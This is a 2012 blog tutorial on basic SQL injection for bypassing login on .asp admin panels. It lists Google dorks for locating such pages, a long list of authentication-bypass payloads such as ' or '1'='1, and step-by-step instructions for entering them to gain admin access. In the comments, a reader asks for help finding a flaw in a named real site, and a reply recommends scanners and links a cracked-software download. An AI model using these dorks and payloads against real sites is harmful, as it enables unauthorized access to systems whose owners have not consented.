
Tuesday, June 26, 2012

Basic SQL Injection Full Tutorials Part 1

Part 1: Basic SQL injection

Note: This tutorial is for educational purposes only. Please don't misuse it.

Q: What is SQL injection?

A: Injecting SQL queries into another database, or using queries to get auth bypass as an admin.

Gaining auth bypass on an admin account. Most sites vulnerable to this are .asp. First we need to find a site; start by opening Google.
Now we type our dork. (Definition of dork: a search entry for a certain type of site/exploit, etc.)
There are a large number of Google dorks for basic SQL injection.
Here are the best:

"inurl:admin.asp"

"inurl:login/admin.asp"

"inurl:admin/login.asp"

"inurl:adminlogin.asp"

"inurl:adminhome.asp"

"inurl:admin_login.asp"

"inurl:administratorlogin.asp"

"inurl:login/administrator.asp"

"inurl:administrator_login.asp"

Now what to do once we get to our site. The site should look something like this :




welcome to xxxxxxxxxx administrator panel
username :

password :

So what we do here is: in the username field we always type "Admin", and for the password we type our SQL injection. Here is a list of SQL injections:

' or '1'='1

' or 'x'='x

' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

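There are many more, but these are the best ones that I know of.
What this SQL injection is doing: confusing the fuck out of the database till it gives you auth bypass. More precisely, when the login page builds its query by pasting the typed values into the SQL text, the quote in the input closes the string and the added "or" condition is always true, so the password check no longer filters anything.
So your input should look like this: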

Username: Admin

password: 'or'1'='1


So click submit and you're in.

NOTE: not all sites are vulnerable.



Comment if you like the tutorials. [Video tutorials coming soon]

By Blog Admin with 3 comments

3 comments:

Please find the vulnerability of this website... I am unable to find it...

http://bietjunagadh.org

dj Alone bro, try a web scanner to find the vulnerability on the site, like WebCruiser, Acunetix, web scanner. You can download the Acunetix full version from here: http://redeyehack.blogspot.in/2012/07/acunetix-7-full-version-free-download.html?m=0

Hello sir,
can you explain what an IP address is
and how it works?
